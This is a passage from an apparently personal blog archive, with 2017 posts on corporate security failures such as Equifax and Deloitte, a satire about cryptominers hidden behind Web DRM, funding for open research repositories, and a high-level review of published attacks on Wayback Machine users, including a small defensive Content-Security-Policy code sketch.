mistakes.<br /><br />You may be thinking Equifax is unusually incompetent. But this is what CEO Smith got right. It isn't possible for an organization to restrict security-relevant operations to security gurus who never make mistakes; there aren't enough security gurus to go around, and even security gurus make mistakes.
It only takes one mistake, in Equifax's case a delay of more than four days in patching a bug in widely used Web infrastructure, to <a href="https://www.bloomberg.com/news/features/2017-09-29/the-equifax-hack-has-all-the-hallmarks-of-state-sponsored-pros">let the bad guys in</a>:<br /><blockquote class="tr_bq">Information [Nike Zheng] provided to Apache, which published it along with a fix on March&nbsp;6, showed how the flaw could be used to steal data from any company using the software. ... Within 24 hours, the information was posted to FreeBuf.com, a Chinese security website, and showed up the same day in Metasploit, a popular free hacking tool. On March 10, hackers scanning the internet for computer systems vulnerable to the attack got a hit on an Equifax server in Atlanta,</blockquote>The delay was, in fact, far worse. In Congressional testimony, <a href="https://arstechnica.com/information-technology/2017/10/a-series-of-delays-and-major-errors-led-to-massive-equifax-breach/">ex-CEO Smith revealed that</a>:<br /><blockquote class="tr_bq">an Equifax e-mail directing administrators to patch a critical vulnerability in the open source Apache Struts Web application framework went unheeded, despite a two-day deadline to comply. Equifax also waited a week to scan its network for apps that remained vulnerable. Even then, the delayed scan failed to detect that the code-execution flaw still resided in a section of the sprawling Equifax site that allows consumers to dispute information they believe is incorrect.<br />...<br />Although a patch for the code-execution flaw was available during the first week of March, Equifax administrators <a href="https://arstechnica.com/tech-policy/2017/09/equifax-cio-cso-retire-in-wake-of-huge-security-breach/">didn't apply it until July 29</a>,</blockquote>Other recent examples of organizational security incompetence include <a href="https://www.theregister.co.uk/2017/09/26/deloitte_leak_github_and_google/">Deloitte</a>:<br /><blockquote class="tr_bq">analyst firm Gartner ... in June <a href="https://www2.deloitte.com/cy/en/pages/about-deloitte/articles/deloitte-ranked-1-gartner-in-security-consulting-for-5th-consecutive-year.html" rel="nofollow" target="_blank">named Deloitte</a> the world’s best IT security consultancy for the fifth year in a row. </blockquote>On September 25th it was <a href="https://www.theregister.co.uk/2017/09/25/deloitte_email_breach/">revealed that Deloitte was</a>:<br /><blockquote class="tr_bq">the victim of a cybersecurity attack that went unnoticed for months. ... The Guardian understands Deloitte discovered the hack in March this year, but it is believed the attackers may have had access to its systems since October or November 2016. ... The hacker compromised the firm’s global email server through an “administrator’s account” that, in theory, gave them privileged, unrestricted “access to all areas”. The account required only a single password and did not have “two-step“ verification, sources said.</blockquote>This motivated others to start looking. By the next day, it was obvious that <a href="https://www.theregister.co.uk/2017/09/26/deloitte_leak_github_and_google/">Deloitte's security wasn't up to scratch</a>. For example (9/26):<br /><blockquote class="tr_bq">a collection of Deloitte's corporate VPN passwords, user names, and operational details were found lurking within a public-facing GitHub-hosted repository. These have since been removed in the past hour or so.
In addition, it appears that a Deloitte employee uploaded company proxy login credentials to his public Google+ page. The information was up there for over six months – and was removed in the past few minutes.</blockquote><a href="https://www.theregister.co.uk/2017/09/26/deloitte_leak_github_and_google/">And also</a>:<br /><blockquote class="tr_bq">Deloitte has loads of internal and potentially critical systems unnecessarily facing the public internet with remote-desktop access enabled. All of this gear should be behind a firewall and/or with two-factor authentication as per industry best practices. ... “Just in the last day I’ve found 7,000 to 12,000 open hosts for the firm spread across the globe,” security researcher Dan Tentler, founder of Phobos Group, told <i>The Register</i> today. “We’re talking dozens of business units around the planet with dozens of IT departments showing very different aptitude levels. The phrase ‘truly exploitable’ comes to mind.”</blockquote><a href="https://www.theregister.co.uk/2017/09/26/deloitte_leak_github_and_google/">Not to mention</a>:<br /><blockquote class="tr_bq">a Deloitte-owned Windows Server 2012 R2 box in South Africa with RDP wide open, acting as what appears to be an Active Directory server – a crucial apex of a Microsoft-powered network – and with, worryingly, security updates still pending installation.</blockquote>If the "security consultancy of the year" for the last five years straight can't get its act together, nor can <a href="http://arstechnica.com/security/2015/06/stepson-of-stuxnet-stalked-kaspersky-for-months-tapped-iran-nuke-talks/">security vendor Kaspersky</a>, what chance has a <a href="https://arstechnica.com/information-technology/2017/09/in-spectacular-fail-adobe-security-team-posts-private-pgp-key-on-blog/">company like Adobe</a> (9/22):<br /><blockquote class="tr_bq">Adobe's Product Security Incident Response Team (PSIRT) took that transparency a little too far today when a member of the team posted the PGP keys for PSIRT's e-mail account—both the public <i>and</i> the private keys.</blockquote><a href="https://arstechnica.com/information-technology/2017/09/password-theft-0day-imperils-users-of-high-sierra-and-earlier-macos-versions/">Or Apple</a> (9/26):<br /><blockquote class="tr_bq">There's a vulnerability in High Sierra and earlier versions of macOS that allows rogue applications to steal plaintext passwords stored in the Mac keychain, a security researcher said Monday.</blockquote>Or the companies targeted in the attack Cisco found that used the <a href="https://www.techdirt.com/articles/20170921/11032238260/ccleaner-hack-may-have-been-state-sponsored-attack-18-major-tech-companies.shtml">popular CCleaner application as a distribution channel</a>, including (9/18):<br /><blockquote class="tr_bq">at least 18 technology giants, including Intel, Google, Microsoft, Akamai, Samsung, Sony, VMware, HTC, Linksys, D-Link and Cisco itself</blockquote>Karl Bode at TechDirt has the first one I've found today (10/3), a <a href="https://www.techdirt.com/articles/20170926/09162938285/auto-location-tracking-company-leaves-customer-data-exposed-online.shtml">vehicle tracking company's database in a public Amazon S3 bucket</a>:<br /><blockquote class="tr_bq">this one is notable for its high creep factor.
SVR advertises that its technology provides “continuous vehicle tracking, every two minutes when moving” and a “four hour heartbeat when stopped.” That means that a hacker that had gained access to the login data would be able to track everywhere a customer's car has been in the past 120 days.</blockquote>Richard Forno of Stanford Law School's Center for Internet and Society points out <a href="http://cyberlaw.stanford.edu/blog/2017/09/equifax-reminder-larger-cybersecurity-problems">additional reasons for complacency about security</a>:<br /><blockquote class="tr_bq">Companies can purchase insurance policies to cover the costs of response to, and recovery from, security incidents like data breaches. <a href="http://www.insurancejournal.com/news/national/2017/09/11/463769.htm">Equifax’s policy</a>, for example, is reportedly more than US$100 million; Sony Pictures Entertainment had in place a <a href="http://www.propertycasualty360.com/2014/12/18/sony-pictures-holds-60-million-cyber-policy-with-m">$60 million policy</a> to help cover expenses after its 2014 breach.<br /><br />This sort of business arrangement – simply transferring the financial risk from one company to another – doesn’t solve any underlying security problems. And since it leaves behind only the risk of some bad publicity, the company’s sense of urgency about proactively fixing problems might be reduced. In addition, it doesn’t address the harm to individual people – such as those whose entire financial histories Equifax stored – when security incidents happen.</blockquote><a href="http://cyberlaw.stanford.edu/blog/2017/09/equifax-reminder-larger-cybersecurity-problems">And</a>:<br /><blockquote class="tr_bq">when cybersecurity problems happen, many companies start offering purported solutions: One industry colleague called this the computer equivalent of “ambulance chasing.” For instance, less than 36 hours after the Equifax breach was made public, the <a href="https://www.bloomberg.com/news/articles/2017-09-13/after-the-equifax-hack-lifelock-sign-ups-jump-tenfold">company’s competitors and other firms</a> increased their advertising of security and identity protection services. But those companies <a href="https://www.wired.com/2015/07/lifelock-failed-one-job-protecting-data/">may not be secure themselves</a>.&nbsp; ...&nbsp; when companies discover that they can make more money selling to customers whose security is violated rather than spending money to keep data safe, they realize that it’s profitable to remain vulnerable.</blockquote>I could keep going, but you get the idea. The supply of incompetence is endless. So also is the supply of vulnerabilities, as shown by the really important 2010 paper by Sandy Clarke, Matt Blaze, Stefan Frei and Jonathan Smith entitled <a href="http://dx.doi.org/10.1145/1920261.1920299"><i>Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities</i></a>. They show that, the older a software code base, the greater the rate at which zero-day vulnerabilities are found. 
So <b>even if an organization is staffed exclusively by infallible security gurus, it will still get compromised</b> via a zero-day.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com33tag:blogger.com,1999:blog-4503292949532760618.post-90600680390357100352017-09-28T08:00:00.003-07:002017-09-28T08:00:01.064-07:00Web DRM Enables Innovative Business ModelEarlier this year I wrote at length about the <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-4.html">looming disaster that was Web DRM</a>, or the W3C's Encrypted Media Extensions (EME). Ten days ago, after unprecedented controversy, a narrow majority of <a href="https://arstechnica.com/gadgets/2017/09/drm-for-html5-published-as-a-w3c-recommendation-after-58-4-approval/">W3C members made EME official</a>.<br /><br />So now I'm here to tell you the good news about how the combination of EME and the blockchain, today's sexiest technology, solves the most pressing issue for the Web, a sustainable business model. Innovators like the <a href="https://betanews.com/2017/09/16/pirate-bay-secret-bitcoin-miner/">Pirate Bay</a> and <a href="https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/">Showtime</a> are already experimenting with it. They have yet to combine it with EME and gain the full benefit. Below the fold, I explain the details of this amazing new business opportunity. Be one of the first to effortlessly profit from the latest technology!<br /><a name='more'></a><br />The Web has two traditional business models. As I wrote back in March, <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-4.html">both are struggling</a>:<br /><blockquote><ul><li>Paywalled content. It turns out that, apart from movies and academic publishing, only a very few premium brands such as <a href="https://www.economist.com/"><i>The Economist</i></a>, the <a href="https://www.wsj.com/"><i>Wall Street Journal</i></a> and the <a href="https://www.nytimes.com/"><i>New York Times</i></a> have viable subscription business models based on (mostly) paywalled content. Even excellent journalism such as <a href="https://www.theguardian.com/"><i>The Guardian</i></a> is reduced to free access, advertising and voluntary donations. ...</li><li>Advertising-supported content. The market for Web advertising is so competitive and fraud-ridden that Web sites have been forced into letting advertisers run <a href="http://blog.dshr.org/2016/08/ok-im-really-amazed.html">ads that are so obnoxious </a>and indeed riddled with malware, and to load up their <a href="http://blog.dshr.org/2016/11/open-access-and-surveillance.html">sites with trackers</a>, that many users have rebelled and use ad-blockers. ...</li></ul></blockquote>The innovative third business model that sites are starting to use is to mine cryptocurrency in the reader's browser, using technology from <a href="https://coin-hive.com/">Coinhive</a>. TorrentFreak estimated that <a href="https://torrentfreak.com/how-much-money-can-pirate-bay-make-from-a-cryptocoin-miner-170924/">The Pirate Bay could make $12K/month</a> in this way.<br /><br />The problem with this approach is twofold. First, it <a href="https://betanews.com/2017/09/16/pirate-bay-secret-bitcoin-miner/">annoys the readers by consuming CPU</a>: <br /><blockquote class="tr_bq">Needless to say, the reaction has not been good -- even from the Pirate Bay's own moderators. 
Over on <a href="https://www.reddit.com/r/thepiratebay/comments/70aip7/100_cpu_on_all_8_threads_while_visiting_tpb/?sort=new">Reddit</a>, there are complaints about "100% CPU on all 8 threads while visiting TPB," and there are also threads on the <a href="https://pirates-forum.org/Thread-PIRATE-BAY-OFFICIAL-SITE-MINER">PirateBay Forum</a>.</blockquote>BleepingComputer tested a <a href="https://www.bleepingcomputer.com/news/security/chrome-extension-embeds-in-browser-monero-miner-that-drains-your-cpu/">Chrome extension that used Coinhive</a> and reported:<br /><blockquote>The impact on our test computer was felt immediately. Task Manager itself froze and entered a Not Responding state seconds after installing the extension. The computer became sluggish, and the SafeBrowse Chrome extension continued to mine Monero at all times when the Chrome browser was up and running.<br /><br />It is no wonder that users reacted with vitriol on the extension's review section. A Reddit user is currently trying to convince other users to report SafeBrowse as malware to the Chrome Web Store admins </blockquote>Second, it is easy for annoyed readers to see the cause of their problems:<br /><blockquote class="tr_bq">The code in question is tucked away in the site’s footer and uses a miner provided by <a href="https://coin-hive.com/">Coinhive</a>. This service offers site owners the option to convert the CPU power of users into Monero coins.<br /><img alt="" class="alignnone size-full wp-image-144755" height="80" src="https://torrentfreak.com/images/foot.png" width="400" /><br />The miner does indeed appear to increase CPU usage quite a bit. It is throttled at different rates (we’ve seen both 0.6 and 0.8) but the increase in resources is immediately noticeable. </blockquote>Then it is easy for them to <a href="https://betanews.com/2017/09/16/pirate-bay-secret-bitcoin-miner/">disable the cryptocurrency miner</a>:<br /><blockquote class="tr_bq">noscript will block it from running, as will disabling javascript.</blockquote>Ad-blockers have <a href="https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/">rapidly adapted to this new incursion</a>:<br /><blockquote>At least two ad blockers have added support for blocking Coinhive's JS library — <a href="https://adblockplus.org/blog/kicking-out-cryptojack" rel="nofollow" target="_blank">AdBlock Plus</a> and <a href="https://blog.adguard.com/en/adguard_vs_mining/" rel="nofollow" target="_blank">AdGuard</a> — and developers have also put together Chrome extensions that terminate anything that looks like Coinhive's mining script — <a href="https://chrome.google.com/webstore/detail/antiminer-block-coin-mine/abgnbkcdbiafipllamhhmikhgjolhdaf" rel="nofollow" target="_blank">AntiMiner</a>, <a href="https://chrome.google.com/webstore/detail/no-coin/gojamcfopckidlocpkbelmpjcgmbgjcl?hl=en" rel="nofollow" target="_blank">No Coin</a>, and <a href="https://chrome.google.com/webstore/detail/minerblock/emikbbbebcdfohonlaifafnoanocnebl" rel="nofollow" target="_blank">minerBlock</a>. </blockquote>So, is this new business model doomed to failure? No! This is where EME comes in. The <a href="https://www.eff.org/deeplinks/2013/10/lowering-your-standards">whole goal of EME</a> is to ensure that the reader and their browser neither know what encrypted content is doing, nor can do anything about it. All that is needed for robust profitability is for the site to use EME to encrypt the payload with the cryptocurrency miner. 
The reader and their browser may see their CPU cycles vanishing, but they can neither know why nor do anything to stop it. Is this brilliant, or what?David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com19tag:blogger.com,1999:blog-4503292949532760618.post-71694650667581873772017-09-26T08:00:00.000-07:002017-09-26T08:00:32.817-07:00Sustaining Open ResourcesCambridge University Office of Scholarly Communication's <a href="https://unlockingresearch.blog.lib.cam.ac.uk/"><i>Unlocking Research</i></a> blog has an interesting trilogy of posts looking at the issue of how open access research resources can be sustained for the long term:<br /><ul><li>Dr. Lauren Cadwallader's <a href="https://unlockingresearch.blog.lib.cam.ac.uk/?p=1483"><i>Open Resources, who should pay</i></a></li><li>David Carr's <a href="https://unlockingresearch.blog.lib.cam.ac.uk/?p=1520"><i>Sustaining open research resources – a funder perspective</i></a></li><li>Dave Gerrard's <a href="https://unlockingresearch.blog.lib.cam.ac.uk/?p=1596"><i>Sustaining long-term access to open research resources – a university library perspective</i></a></li></ul>Below the fold I summarize each of their arguments and make some overall observations.<br /><a name='more'></a><h3><a href="https://unlockingresearch.blog.lib.cam.ac.uk/?p=1483">Lauren Cadwallader</a></h3>From the researcher's perspective, Dr. Cadwallader uses the example of the <a href="http://www.virtualflybrain.org/site/vfb_site/home.htm">Virtual Fly Brain</a>, a domain-specific repository for the connections of neurons in <i>Drosophila</i> brains. It was established by UK researchers 8 years ago and is now used by about 10 labs in the UK and about 200 worldwide. It was awarded a 3-year Research Council grant, which was not renewed. The Wellcome Trust awarded a further 3-year grant, ending this month. As of June:<br /><blockquote>it is uncertain whether or not they will fund it in the future. ... On the one hand funders like the Wellcome Trust, Research Councils UK and National Institutes of Health (NIH) are encouraging researchers to use domain specific repositories for data sharing. Yet on the other, they are acknowledging that the current approaches for these resources are not necessarily sustainable. </blockquote>Clearly, this is a global resource, not a UK one, but there is no global institution funding research in <i>Drosophila</i> brains. There is a free rider problem; each individual national or charitable funder depends on the resource but would rather not pay for it, and there is no penalty for avoiding paying until it is too late and the resource has gone.<br /><h3><a href="https://unlockingresearch.blog.lib.cam.ac.uk/?p=1520">David Carr</a></h3>From the perspective of the <a href="http://www.wellcome.ac.uk/openresearch">Open Research team</a> at the Wellcome Trust, Carr notes that:<br /><blockquote class="tr_bq">Rather than ask for a data management plan, applicants are now asked to provide an outputs management plan setting out how they will maximise the value of their research outputs more broadly.<br /><br />Wellcome commits to meet the costs of these plans as an integral part of the grant, and provides <a href="https://wellcome.ac.uk/funding/managing-grant/developing-outputs-management-plan">guidance</a> on the costs that funding applicants should consider. We recognise, however, that many research outputs will continue to have value long after the funding period comes to an end.
We must accept that preserving and making these outputs available into the future carries an ongoing cost.</blockquote>Wellcome has been addressing these ongoing costs by providing:<br /><blockquote>significant grant funding to repositories, databases and other community resources. As of July 2016, Wellcome had active grants totalling £80 million to support major data resources. We have also invested many millions more in major cohort and longitudinal studies, such as UK Biobank and ALSPAC. We provide such support through our <a href="https://wellcome.ac.uk/funding/biomedical-resource-and-technology-development-grants">Biomedical Resource and Technology Development</a> scheme, and have provided additional major awards over the years to support key resources, such as <a href="https://www.ebi.ac.uk/pdbe/">PDB-Europe</a>, <a href="http://www.ensembl.org/index.html">Ensembl</a> and the <a href="https://www.openmicroscopy.org/">Open Microscopy Environment</a>. </blockquote>However, these are still grants with end-dates, like the one the Virtual Fly Brain faced:<br /><blockquote>While our funding for these resources is not open-ended and subject to review, we have been conscious for some time that the reliance of key community resources on grant funding (typically of three to five years’ duration) can create significant challenges, hindering their ability to plan for the long-term and retain staff. </blockquote>Clearly funders have difficulty committing funds for the long term. And if their short-term funding is successful, they are faced with a "too big to fail" problem. The repository says "pay up now or the entire field of research gets it". Not where a funder wants to end up. Nor is the necessary brinkmanship conducive to "their ability to plan for the long-term and retain staff".<br /><br />An international workshop of data resources and major funders in the life sciences:<br /><blockquote class="tr_bq">resulted in a <a href="http://www.biorxiv.org/content/early/2017/04/27/110825">call for action</a> (<a href="http://www.nature.com/nature/journal/v543/n7644/full/543179a.html">reported in <i>Nature</i></a>) to coordinate efforts to ensure long-term sustainability of key resources, whilst supporting resources in providing access at no charge to users. The group proposed an international mechanism to prioritise core data resources of global importance, building on the work undertaken by ELIXIR to <a href="https://f1000research.com/articles/5-2422/v2">define criteria for such resources</a>. It was proposed national funders could potentially then contribute a set proportion of their overall funding (with initial proposals suggesting around 1.5 to 2 per cent) to support these core data resources.</blockquote>A voluntary "tax" of this kind may be the least bad approach to funding global resources.<br /><h3><a href="https://unlockingresearch.blog.lib.cam.ac.uk/?p=1596">Dave Gerrard</a></h3>From the perspective of a Technical Specialist Fellow from the Polonsky-Foundation-funded <a href="https://www.dpoc.ac.uk/">Digital Preservation at Oxford and Cambridge</a> project, Gerrard argues that there are two different audiences for open resources.
I agree with him about the <a href="https://documents.clockss.org/index.php?title=CLOCKSS:_Designated_Community">impracticality of the OAIS concept</a> of Designated Community: <br /><blockquote class="tr_bq"><span style="font-weight: 400;">The concept of Designated Communities is one that, in my opinion, the OAIS Reference Model never adequately gets to grips with. For instance, the OAIS Model suggests including explanatory information in specialist repositories to make the content understandable to the general community.</span><br /><br /><span style="font-weight: 400;">Long term access within this definition thus implies designing repositories for Designated Communities consisting of what my co-Polonsky-Fellow Lee Pretlove describes as: “all of humanity, plus robots”. The deluge of additional information that would need to be added to support this totally general resource would render it unusable; to aim at everybody is effectively aiming at nobody. And, crucially, “nobody” is precisely who is most likely to fund a “specialist repository for everyone”, too.</span></blockquote>Gerrard argues that the two audiences need:<br /><blockquote class="tr_bq"><span style="font-weight: 400;">two quite different types of repository. There’s the ‘ultra-specialised’ Open Research repository for the Designated Community of researchers in the related domain, and then there’s the more general institutional ‘special collection’ repository containing materials that provide context to the science, ..</span><span style="font-weight: 400;">. Sitting somewhere between the two are publications – the specialist repository might host early drafts and work in progress, while the institutional repository contains finished, publish work. And the institutional repository might also collect enough data to support these publications</span></blockquote>Gerrard is correct to point out that:<br /><blockquote class="tr_bq"><span style="font-weight: 400;">a scientist needs access to her ‘personal papers’ while she’s still working, so, in the old days (i.e. more than 25 years ago) the archive couldn’t take these while she was still active, and would often have to wait for the professor to retire, or even die, before such items could be donated. However, now everything is digital, the prof can both keep her “papers” locally </span><i><span style="font-weight: 400;">and deposit them at the same time</span></i><span style="font-weight: 400;">. The library special collection </span><i><span style="font-weight: 400;">doesn’t need to wait for the professor to die</span></i><span style="font-weight: 400;"> to get their hands on the context of her work. Or indeed, wait for her to become a professor.</span></blockquote>This works in an ideal world because:<br /><blockquote class="tr_bq"><span style="font-weight: 400;">A further outcome of being able to donate digitally is that <b>scientists become more responsible for managing their personal digital materials well</b>, so that it’s easier to donate them as they go along.</span></blockquote><span style="font-weight: 400;">But in the real world this effort to "</span><span style="font-weight: 400;"><span style="font-weight: 400;">keep their ongoing work neat and tidy" is frequently viewed as a distraction from the urgent task of publishing not perishing. The researcher bears the cost of depositing her materials, the benefits accrue to other researchers in the future. 
Not a powerful motivation.</span></span><br /><span style="font-weight: 400;"><span style="font-weight: 400;"><br /></span></span><span style="font-weight: 400;"><span style="font-weight: 400;">Gerrard argues that his model clarifies the funding issues:</span></span><br /><blockquote class="tr_bq"><span style="font-weight: 400;"><span style="font-weight: 400;"><span style="font-weight: 400;">Funding specialist Open Research repositories should be the responsibility of funders in that domain, but they shouldn’t have to worry about long-term access to those resources. As long as the science is active enough that it’s getting funded, then a proportion of that funding should go to the repositories that science needs to support it.</span></span></span></blockquote><span style="font-weight: 400;"><span style="font-weight: 400;">Whereas:</span></span><br /><blockquote class="tr_bq"><span style="font-weight: 400;">university / institutional repositories need to find quite separate funding for their archivists to start building relationships with those same scientists, and working with them to both collect the context surrounding their science as they go along, and prepare for the time when the specialist repository needs to be mothballed. With such contextual materials in place, there don’t seem to be too many insurmountable technical reasons why, when it’s acknowledged that the “switch from one Designated Community to another” has reached the requisite tipping point, the university / institutional repository couldn’t archive the whole of the specialist research repository, describe it sensibly using the contextual material they have collected from the relevant scientists as they’ve gone along, and then store it cheaply</span></blockquote><span style="font-weight: 400;"><span style="font-weight: 400;">This sounds plausible but both halves ignore problems:</span></span><br /><ul><li><span style="font-weight: 400;"><span style="font-weight: 400;">The value of the resource will outlast many grants, since funders are constrained to award short-term grants. A voluntary "tax" on these grants would diversify the repository's income, but voluntary "taxes" are subject to the free-rider problem. To assure staff recruiting and minimize churn, the repository needs reserves, so the tax needs to exceed the running cost, reinforcing the free-rider's incentives.</span></span></li><li>These open research repositories are a global resource. Once the "tipping point" happens, which of the many university or institutional repositories gets to bear the cost of ingesting and preserving the global resource? All the others get to free-ride. Or does Gerrard envisage disaggregating the domain repository so that each researcher's contributions end up in their institution's repository? If so, how are contributions handled from (a) collaborations between labs, and (b) a researcher's career that spans multiple institutions? Or does he envisage the researcher depositing everything into <i>both</i> the domain <i>and</i> the institutional repository? The researcher's motivation is to deposit into the domain repository. The additional work to deposit into the institutional repository is just make-work to benefit the institution, to which these days most researchers have little loyalty. The whole value of domain repositories is the way they aggregate the outputs of all researchers in a field.
Isn't it important to preserve that value for the long term?</li></ul>David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com1tag:blogger.com,1999:blog-4503292949532760618.post-90551706619699136472017-09-19T08:00:00.001-07:002017-09-19T08:00:10.591-07:00Attacking (Users Of) The Wayback MachineRight from the start, <a href="http://blog.dshr.org/2013/10/it-was-fifteen-years-ago-today.html">nearly two decades ago</a>, the <a href="http://lockss.org/locksswiki/files/Freenix2000.pdf">LOCKSS system assumed that</a>: <br /><blockquote>Alas, even libraries have enemies. Governments and corporations have tried to rewrite history. Ideological zealots have tried to suppress research of which they disapprove. </blockquote>The <a href="http://dx.doi.org/10.1145/945445.945451">LOCKSS polling and repair protocol</a> was designed to make it as difficult as possible for even a powerful attacker to change content preserved in a decentralized LOCKSS network, by exploiting excess replication and the lack of a central locus of control.<br /><br />Just like libraries, Web archives have enemies. <a href="http://blog.dshr.org/2017/06/wac2017-security-issues-for-web-archives.html">Jack Cushman and Ilya Kreymer's (CK) talk at the 2017 Web Archiving Conference</a> identified <a href="http://blog.dshr.org/2017/06/wac2017-security-issues-for-web-archives.html">seven potential vulnerabilities</a> of centralized Web archives that an attacker could exploit to change or destroy content in the archive, or mislead an eventual reader as to the archived content.<br /><br />Now, <a href="http://repository.wellesley.edu/scholarship/158/"><i>Rewriting History: Changing the Archived Web from the Present</i></a> by Ada Lerner <i>et al.</i> (L) identifies four attacks that, without compromising the archive itself, caused browsers using the Internet Archive's Wayback Machine to view pages that look different to the originally archived content. It is important to observe that the title is misleading, and that these attacks are less serious than those that compromise the archive. Problems with replaying archived content are fixable; loss or damage to archived content is not.<br /><br />Below the fold I examine L's four attacks and relate them to CK's seven vulnerabilities.<br /><a name='more'></a><br />To review, CK's seven vulnerabilities are:<br /><ol><li>Archiving local server files, in which resources <i>local to the crawler</i> end up in the archive.</li><li>Hacking the headless browser, in which vulnerabilities in the execution of Javascript by the crawler are exploited.</li><li>Stealing user secrets during capture, a vulnerability of user-driven crawlers which typically violate cross-domain protections.</li><li>Cross site scripting to <a href="http://blog.dshr.org/2017/06/wac2017-security-issues-for-web-archives.html">steal archive logins</a>:<br /><blockquote>When replaying preserved content, the archive must serve all preserved content from a different top-level domain from that used by users to log in to the archive and for the archive to serve the parts of a replay page (e.g. the Wayback machine's timeline) that are not preserved content. The preserved content should be isolated in an iframe.
</blockquote></li><li>Live web leakage on <a href="http://blog.dshr.org/2017/06/wac2017-security-issues-for-web-archives.html">playback</a>:<br /><blockquote>Especially with Javascript in archived pages, it is hard to make sure that all resources in a replayed page come from the archive, not from the live Web. If live Web Javascript is executed, all sorts of bad things can happen. Malicious Javascript could exfiltrate information from the archive, track users, or modify the content displayed. </blockquote></li><li>Show different page contents when archived:<br /><blockquote>it is possible for an attacker to create pages that detect when they are being archived, so that the archive's content will be unrepresentative and possibly hostile. Alternately, the page can detect that it is being replayed, and display different content or attack the replayer. </blockquote></li><li>Banner spoofing:<br /><blockquote>When replayed, malicious pages can overwrite the archive's banner, misleading the reader about the provenance of the page. </blockquote></li></ol>Vulnerabilities CK1 through CK4 are attacks on the archive itself, possibly leading to corruption and loss. The remaining three are attacks on the eventual reader, similar to of L's four. You need to read the paper to get the full details of their attacks, but in summary they are are:<br /><ol><li>Archive-Escape Abuse: The attackers identified an archived victim page that embedded a JavaScript resource from a third-party domain that had no owner, which they show is common. The resource was not present in the archive, so when they obtained control of the domain they were able to serve from it malicious JavaScript that the page served from the Wayback Machine would include. This is a version of vulnerability CK5.</li><li>Same-Origin Escape Abuse: The attackers identified an archived victim page that, in an iframe from a third-party domain, included malicious JavaScript. On the live Web the Same-Origin policy prevented it from executing, but when served from the Wayback Machine the page and the iframe had the same origin. This is related to vulnerability CK4. It requires foresight, since the iframe code must be present at ingest time.</li><li>Same-Origin Escape + Archive-Escape: The attackers combined L1 and L2 by including in the iframe code that deliberately generated archive escapes. It again requires foresight, since the escape-generating code must be present at ingest time.</li><li>Anachronism-Injection: The attackers identified an archived victim page that embedded a JavaScript resource from a third-party domain that had no owner. The resource was not present in the archive, so when they obtained control of the domain they could use the Wayback Machine's "Save Page Now" facility to create an archived version of the resource. Now when the Wayback Machine served the page, the attackers' version of the resource would be served from the archive. 
The only way to defend against this attack, since the attacker's version of the resource will always be the closest in time to the victim page, would be to restrict searches for nearest-in-time resources to a small time range.</li></ol>Unlike L, CK note that Web archives could <a href="http://blog.dshr.org/2017/06/wac2017-security-issues-for-web-archives.html">prevent leaks to the live Web</a>:<br /><blockquote class="tr_bq">Injecting the <a href="https://content-security-policy.com/">Content-Security-Policy</a> (CSP) header into replayed content could mitigate these risks by preventing compliant browsers from loading resources except from the specified domain(s), which would be the archive's replay domain(s).</blockquote>Web archives should; browsers have <a href="https://content-security-policy.com/">supported the CSP header</a> for at least 4 years. The version of the Wayback Machine used by the Internet Archive's Archive-It service uses CSP to prevent live Web leakage, but the main Wayback Machine currently doesn't. If it did, L1 through L3 would be ineffective.
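To make CK's suggested mitigation concrete, here is a minimal sketch (my illustration, not the Wayback Machine's actual code) of a replay server injecting such a header; the replay domain is a hypothetical placeholder:

```python
# Toy replay server illustrating the CSP mitigation CK describe: every
# response carries a Content-Security-Policy header restricting resource
# loads to the archive's own replay domain, so a compliant browser will
# refuse to fetch anything from the live Web.
from http.server import BaseHTTPRequestHandler, HTTPServer

REPLAY_DOMAIN = "replay.archive.example"  # hypothetical placeholder

class ReplayHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # In a real archive this would be the preserved page payload.
        body = b"<html><body>replayed content</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        # Block scripts, images, CSS, frames, etc. from any other origin.
        self.send_header("Content-Security-Policy",
                         "default-src 'self' https://" + REPLAY_DOMAIN)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("localhost", 8080), ReplayHandler).serve_forever()
```

With resource loads pinned to the replay domain in this way, the attacker-controlled live-Web script in L1 through L3 would simply never be fetched.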
<br /><br />All this being said, there are some important caveats that users of preserved Web content should bear in mind. It is extremely likely that the payload of a URL delivered by the Wayback Machine is the same as the one its crawler collected at the specified time. However, this does <i>not</i> mean that the rendered page in your browser looks the same as it would have had you visited the page when the Wayback Machine's crawler did:<br /><ul><li>If the Web archive's replay system does not use CSP, all bets are off.</li><li>Browsers evolve, rendering pages differently. Using <a href="http://oldweb.today/">oldweb.today</a> can mitigate, but not eliminate, this problem, as I wrote in <a href="http://blog.dshr.org/2016/01/the-internet-is-for-cats.html"><i>The Internet Is for Cats</i></a>.</li><li>The embedded resources, such as images, CSS files, and JavaScript libraries, may not have been collected at the same time as the page itself, so may be different, as in the L4 attack.</li><li>At collection time, the owner of the page's domain, or the domain of any of the embedded resources, or even someone who had compromised the Web servers of the page or any of its embedded resources, could be malicious. As in the CK6 vulnerability, they could detect that the page was being archived and deliver to the crawler a <a href="https://en.wikipedia.org/wiki/Rickrolling">payload different from</a> the one they would have delivered to a browser.</li></ul>The bottom line is that all critical uses of preserved Web content, such as legal evidence, should be based on the <i>source of the payload</i>, not on a rendered page image.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com2tag:blogger.com,1999:blog-4503292949532760618.post-65579742688728894642017-09-12T08:00:00.000-07:002017-09-12T08:00:02.540-07:00The Internet of Things is Haunted by DemonsThis is just a quick note to get you to read Cory Doctorow's <a href="http://www.locusmag.com/Perspectives/2017/09/cory-doctorow-demon-haunted-world/"><i>Demon-Haunted World</i></a>. We all know that the Internet of Things is <a href="http://blog.dshr.org/2016/12/bitag-on-iot.html">infested with bugs</a> that <a href="http://blog.dshr.org/2014/10/familiarity-breeds-contempt.html">cannot be exterminated</a>. That's not what Doctorow is writing about. He is focused on the non-bug software in the Things that makes them do what their 